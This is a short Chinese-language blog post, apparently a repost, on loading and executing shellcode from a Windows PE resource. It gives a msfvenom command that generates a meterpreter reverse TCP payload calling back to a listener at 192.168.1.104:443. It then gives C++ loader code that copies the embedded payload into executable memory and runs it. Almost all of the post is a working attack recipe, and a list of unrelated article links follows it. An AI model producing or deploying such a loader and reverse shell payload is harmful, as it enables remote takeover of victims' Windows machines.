从PE资源加载和执行Shellcode

首先生成shellcode

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.1.104 LPORT=443 > shellcode.bin

在解决方案资源管理器中右键单击并选择Resource FilesAdd > Resource

// ConsoleApplication12.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <iostream>
#include <Windows.h>
#include "resource.h"

int main()
{
	// IDR_METERPRETER_BIN1 - is the resource ID - which contains ths shellcode
	// METERPRETER_BIN is the resource type name we chose earlier when embedding the meterpreter.bin
	HRSRC shellcodeResource = FindResource(NULL, MAKEINTRESOURCE(IDR_SHELL_CODE1), L"SHELL_CODE");
	DWORD shellcodeSize = SizeofResource(NULL, shellcodeResource);
	HGLOBAL shellcodeResouceData = LoadResource(NULL, shellcodeResource);
	
	void *exec = VirtualAlloc(0, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(exec, shellcodeResouceData, shellcodeSize);
	((void(*)())exec)();

	return  0;
}

查看全文

相关阅读:
移动端底部fixed固定定位输入框ios下不兼容
 mint-ui Picker设置指定初始值
 vue项目的mode:history模式
 更改checkbox的默认样式
 vue组件通信的几种方式
 Python运行Google App Engineer时出现的UnicodeDecodeError错误解决方案
 ActionFilterAttribute之HtmlFilter,压缩HTML代码
 MongoDB C#驱动中Query几个方法
 无需路由端口映射花生壳6.5工程版发布
 如何让搜索引擎抓取AJAX内容？

原文地址：https://www.cnblogs.com/-zhong/p/13908954.html